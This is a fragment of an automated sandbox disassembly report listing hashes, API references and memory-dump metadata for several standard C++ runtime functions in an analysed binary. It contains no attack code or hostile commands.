                                          • Opcode ID: 19b8c0ce37fe9b9cbeb6dc2ba85fa1e8197bd27f0c4e381f9bac955803ee8ce8
                                          • Instruction ID: 2da819363344bc780b06f09caac1e64cf1a5791886e1f662f8e21bf29e01e0e1
                                          • Opcode Fuzzy Hash: 19b8c0ce37fe9b9cbeb6dc2ba85fa1e8197bd27f0c4e381f9bac955803ee8ce8
                                          • Instruction Fuzzy Hash: 18F08275E1420CDBCB15DF68D98198EBBF4AF55300B1082AEE545A7300EAB06A59CB95
                                          Function 009B2B00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 009B2B1D
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 009B2B39
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                          • String ID: w#G!
                                          • API String ID: 593203224-519468572
                                          • Opcode ID: 140040e6392e0dcd0a21508a0e521916051b413350f0027b773f925a67177223
                                          • Instruction ID: ef42d59d05ae3a1c3cc4420403d183b4ebdc9b644436cb9733ea7740457d25d6
                                          • Opcode Fuzzy Hash: 140040e6392e0dcd0a21508a0e521916051b413350f0027b773f925a67177223
                                          • Instruction Fuzzy Hash: 5DF01230911218DFD714EF68EA41BA9B7F4FB15311F50026ED58657280EF705D56CB85
                                          Function 009B2460 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 009B2493
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ___std_exception_copy
                                          • String ID: bad conversion$w#G!
                                          • API String ID: 2659868963-4250247085
                                          • Opcode ID: 7a5a426d2016721306906442fa02054723dc33af702f2be3a128faf2cdeb554e
                                          • Instruction ID: 1e05a322e607be38c038dea8e2b771cbffcc229fa0587de932cc785f7ad4212e
                                          • Opcode Fuzzy Hash: 7a5a426d2016721306906442fa02054723dc33af702f2be3a128faf2cdeb554e
                                          • Instruction Fuzzy Hash: 2EF082709102489BC711DF68D94199EF7F8EF55301B1042AEE54167301EBB05A598B95
                                          Function 00A60064 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: NameName::
                                          • String ID: {flat}
                                          • API String ID: 1333004437-2606204563
                                          • Opcode ID: a4ba9e70e0b1a68f92c04626c0730d60b452ba2f96fe2b825b907b0b1ee0fea6
                                          • Instruction ID: f3a8ccc9ae980f31d148c188dc2da52bf6367664a02e1d70bc066bdbfa5ed9ba
                                          • Opcode Fuzzy Hash: a4ba9e70e0b1a68f92c04626c0730d60b452ba2f96fe2b825b907b0b1ee0fea6
                                          • Instruction Fuzzy Hash: D5F03971251208DFDB10DB98D5A5FEA3BE0AB01716F198445E84D4F6A2CB79D8D087A0
                                          Function 00A52735 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                          Download Yara Rule
                                          APIs
                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A52754
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A52762
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                          • String ID: pThreadProxy
                                          • API String ID: 1687795959-3651400591
                                          • Opcode ID: a163394ad03c894ab8c443a84b4fc079c81765e936747da11f26ee31420ff303
                                          • Instruction ID: 9c12dc067fc2b7a410195577ce78de2a2983bbf7b3ce8e081a938ae6dd5b4f9a
                                          • Opcode Fuzzy Hash: a163394ad03c894ab8c443a84b4fc079c81765e936747da11f26ee31420ff303
                                          • Instruction Fuzzy Hash: 1FD05B31E0030866CB00E775D947FDE73EC7B04744F0044786D14A6051EA70D50887A0
                                          Function 00A58FA5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                          Download Yara Rule
                                          APIs
                                          • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00A58FB1
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A58FD8
                                            • Part of subcall function 00A57E0C: RaiseException.KERNEL32(?,?,00A2538C,?,?,Dflt,?,?,?,?,?,00A2538C,?,00AC99F0,?), ref: 00A57E6C
                                          Strings
                                          • Access violation - no RTTI data!, xrefs: 00A58FA8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                          • String ID: Access violation - no RTTI data!
                                          • API String ID: 2053020834-2158758863
                                          • Opcode ID: 2f3ab51f24edded8e3e82108044053a861bec7d90feaebcf6b36963082007b47
                                          • Instruction ID: 249f172d4a8a9db70cef93931b3329746a7a489e8c13cb9598b315596da54d33
                                          • Opcode Fuzzy Hash: 2f3ab51f24edded8e3e82108044053a861bec7d90feaebcf6b36963082007b47
                                          • Instruction Fuzzy Hash: 84D0C932D4420C6ADE18D6E09A0B8EE63F8B908311F200886EF20BB441AE75BE0C47A1